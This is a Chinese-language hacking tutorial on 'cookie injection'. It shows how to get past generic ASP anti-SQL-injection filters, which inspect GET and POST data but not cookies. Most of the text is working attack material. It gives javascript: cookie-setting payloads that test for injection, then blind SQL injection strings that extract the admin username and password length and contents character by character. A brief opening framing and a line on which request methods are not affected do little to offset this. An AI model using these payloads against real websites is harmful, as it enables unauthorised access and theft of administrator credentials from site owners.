通过cookies注入破解ASP通用防注入程序

作者:网络 来源:佚名 更新时间:2009-01-11 11:36:04 点击:

在一次网站被注入木马后,很是郁闷,网站已经放入了通用的asp防注入程序,但依然被注入。

在查阅了大量的资料后,终于发现了问题所在。

现在很多网站都加了防注入系统代码,你输入注入语句将无法注入~~
感觉这样的防注入系统不错,但防注入系统没有注意到 cookies 的问题!
所以就有了cookies注入~~

我们来研究一下怎样情况下才会有cookies注入!
如果你学过asp
你应该会知道 request.querystring (get) 或 request.form (post)!
呵,没错,这就是我们用于读取用户发给web服务器的指定键中的值!
我们有时为了简化代码,会写成
id=request("id")
这样写法是简单了,但问题就来了~~~
我们先看web服务是怎样读取数据的,他是先取get中的数据,没有再取post中的数据,还会去取cookies中的数据

我们再看看防注入系统,他会检测get和post中的数据,如果有特殊字符(这里当然是注入字符了)!
就禁止数据的提交! 但他没有检测cookies的数据!问题就来了~~~
那我们怎样测试是否有cookies注入问题~

请先看下面的的连接(示例用,所以连接不是真的)

http://www.xxx.com/1.asp?id=123

如果我们只输 http://www.xxx.com/1.asp

时,就不能看到正常的数据,因为没有参数!
我们想知道有没有cookies问题(也就是有没有request("xxx")格式问题),
先用ie输入
http://www.xxx.com/1.asp
加载网页,显示不正常(没有输参数的原因)
之后在ie输入框再输入
javascript:alert(document.cookie="id="+escape("123"));
按回车,你会看到弹出一个对话框 内容是: id=123
之后,你刷新一个网页,如果正常显示,表示是用
request("id") 这样的格式收集数据~~~~,这种格式就可以试cookies注入了

在输入框中输入
javascript:alert(document.cookie="id="+escape("123 and 3=3"));
刷新页面,如果显示正常,可以再试下一步(如果不正常,就有可能也有过滤了)

javascript:alert(document.cookie="id="+escape("123 and 3=4"));刷新一下页面
如果不正常显示,这就表示有注入了~~~

如果程序员是用
request.querystring

request.form
收集数据的话,是无法利用cookies绕过防注入系统进行注入的,因为服务程序是直截从get或post中读取数据的,cookies是否有

数据,web服务器是不理的,所以就无法利用了!~

--------------------------------------------------------------------------
为了方便不懂的朋友了解
javascript:alert(document.cookie="id="+escape("123"));
的意思,我说明一下
document.cookie="id="+escape("123") 就是把 123 保存到cookies 的 id 中
alert(xxx) 就是弹对话框

猜解管理员帐号长度:
javascript:alert(document.cookie="id="+escape("51 and (select len(username) from admin)=5"));

猜解管理员密码长度:
javascript:alert(document.cookie="id="+escape("51 and (select len(password) from admin)=16"));

猜解username里的内容:

猜解admin表,username字段,第1位对应的ascii码
javascript:alert(document.cookie="id="+escape("51 and (select asc(mid(username,1,1)) from admin)=97"));
                                                                 (mid(列名,2,1))
                                                                 (mid(列名,3,1))
....

猜解password里的内容:
猜解admin表,password字段,第1位对应的ascii码
javascript:alert(document.cookie="id="+escape("51 and (select asc(mid(password,1,1)) from admin)<97"));
                                                                 (mid(列名,2,1))
                                                                 (mid(列名,3,1))
....